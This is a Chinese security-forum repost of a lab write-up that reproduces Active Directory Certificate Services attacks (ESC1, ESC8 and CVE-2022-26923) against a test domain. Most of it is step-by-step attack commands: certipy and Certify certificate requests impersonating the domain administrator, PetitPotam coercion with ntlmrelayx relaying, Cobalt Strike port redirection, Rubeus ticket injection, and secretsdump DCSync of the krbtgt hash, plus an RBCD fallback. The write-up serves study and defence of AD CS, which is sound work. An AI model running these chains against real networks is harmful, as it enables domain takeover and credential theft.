设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 ADCS攻击笔记
返回列表 发新帖
查看: 906|回复: 0

ADCS攻击笔记

[复制链接]
luozhenni

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-13 07:35:53 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-9-13 07:35 编辑


ADCS攻击笔记
原文链接:ADCS攻击笔记
17岁的one 衡阳信安 2022-09-13 00:00 发表于广西

前言
本篇文章主要是对《Certified Pre-Owned: Abusing Active Directory Certificate Services》(链接文章末尾)中提到ESC1&ESC8和最新的ADCS漏洞CVE-2022–26923的复现。
Author: 0ne
环境介绍
DC2012 191.168.149.133 Windows Server 2012 R2-域控
ADCS 192.168.149.135 Windows Server 2012 R2-AD证书服务器
WIN10 192.168.149.134 Windows 10-模拟办公网个人PC
kali 192.168.149.129 kali攻击机
信息枚举
域内
是否存在域和ADCS,并且获取CA和对应IP.
net config workstationnslookup -type=srv _ldap._tcp.dc._msdcs.FQDNcertutil -CAnslookup DNSName
编辑

编辑
编辑
编辑
不要使用certutil -config - -ping,在beacon里操作主机会弹窗,而且需要点击后才会有回显:
编辑
域外

判断是否存在域,通常域控的NetBIOS名称有关键字例如DC字样,fscan也能直接识别,域控也会通常开启53&88&389&636端口。
编辑
编辑
通过各种方法我们已经获得了一个域账号,查看是否有ADCS服务:
certipy find -u zhangsan@red.lab -p zs@123456 -dc-ip 192.168.149.133 -dc-only -stdout
编辑
域外获取ADCSIP,使用ADExplorer连接DC的ldap:
编辑
当然ADCS存在页面http[:]//IP/certsrv/Default.asp,fscan能直接识别:
编辑
ESC1
漏洞配置
ESC1利用前提条件:
  • msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT
    表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括域管理员用户
  • PkiExtendedKeyUsage: Client Authentication
    表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证
  • Enrollment Rights: NT Authority\Authenticated Users
    表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书
创建模板ESC1开启ENROLLEE_SUPPLIES_SUBJECT:
编辑
将模板用于客户端身份验证(Client Authentication):
编辑

设置权限允许普通用户注册(Authenticated Users or Domain Users):
编辑
认证后的用户/域用户随便勾一个就行了
漏洞利用

域内
execute-assembly \path\Certify.exe find /vulnerable
编辑
发现存在漏洞,为域管请求证书,转换格式,请求TGT,PTT:
  1. execute-assembly \path\Certify.exe request /ca:【CA Name】 /template:VulnTemplate /altname:domadmin
  2. openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  3. execute-assembly \path\Rubeus.exe asktgt /user:<$adUserToImpersonate> /certificate:cert.pfx /ptt
复制代码

编辑
编辑
域外
certipy find -u zhangsan@red.lab -p zs@123456 -dc-ip 192.168.149.133 -vulnerable -stdout
编辑
发现存在ESC1可利用的模板,为域管请求证书,转换格式,请求TGT,DCSync或者PTT:
  1. target为ADCSIP
  2. certipy req -u zhangsan@red.lab -p zs@123456 -target 192.168.149.135 -ca red-ADCS-CA -template ESC1 -upn administrator@red.lab
  3. certipy auth -pfx administrator.pfx -dc-ip 192.168.149.133
  4. secretsdump.py red.lab/administrator@192.168.149.133 -just-dc-user red/krbtgt -hashes :nthash
复制代码

编辑
ESC8
漏洞简介
ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制域控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。
漏洞利用
certipy find -u zhangsan@red.lab -p zs@123456 -dc-ip 192.168.149.133 -vulnerable -stdout
编辑
域内
execute-assembly \path\ADCSPwn.exe --adcs ADCS.red.lab --remote DC2012.red.lab
编辑
execute-assembly \path\Rubeus.exe asktgt /userC2012$ /certificate:<base64-certificate> /pttdcsync red.lab red\krbtgt
编辑
编辑
编辑
使用ADCSpwn打ESC8需要域控启用WebClient服务,默认是没有安装该功能的。
DC安装桌面体验重启即可:

编辑
编辑
域外
PetitPotam.py Relayip DCip
让域控强制向我们控制的WIN10发起认证


  1. PortBender redirect 445 8445
  2. rportfwd_local 8445 127.0.0.1 8445
  3. ntlmrelayx.py -t http://192.168.149.135/certsrv/certfnsh.asp -smb2support --adcs --template DomainController --smb-port 8445
复制代码

将WIN10的445端口重定向到8445,然后将WIN10-8445端口转发到CS client端的8445端口,实战中还需要通过socks隧道用proxychains将relay的流量打入到目标环境。因为CS client是通目标IP的,就未作模拟。
编辑
编辑
execute-assembly \path\Rubeus.exe asktgt /userC2012$ /certificate <base64-certificate> /ptt dcsync red.lab red\krbtgt
编辑

CVE-2022–26923
漏洞简介
该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。
漏洞利用
添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:
certipy account create -u zhangsan@red.lab -p zs@123456 -dc-ip 192.168.149.133 -user win -pass win@123456 -dns 'DC2012.red.lab'
编辑
用该机器账户向ADCS请求证书:
certipy req -u 'win$'@red.lab -p win@123456 -target 192.168.149.135 -ca red-ADCS-CA -template Machine

编辑

用申请的证书请求DC$的TGT:
certipy auth -pfx dc2012.pfx -dc-ip 192.168.149.133
编辑
用DC$的nthash去DCSync:
secretsdump.py red.lab/'DC2012$'@192.168.149.133 -just-dc-user red/krbtgt -hashes :nthash
编辑
如果使用certipy请求TGT失败,还可以设置RBCD来攻击:

openssl pkcs12 -in dc2012.pfx -out dc2012.pem -nodespython3 bloodyAD.py -c ':dc2012.pem' -u 'win$' --host 192.168.149.133 setRbcd 'win$' 'DC2012$'getST.py red.lab/'win$':'win@123456' -spn LDAP/DC2012.red.lab -impersonate administrator -dc-ip 192.168.149.133export KRB5CCNAME=administrator.ccachesecretsdump.py -k dc2012.red.lab -just-dc-user red/krbtgt


编辑
编辑

来源:先知(https://xz.aliyun.com/t/11327)
注:如有侵权请联系删除


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-19 03:30 , Processed in 0.025851 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表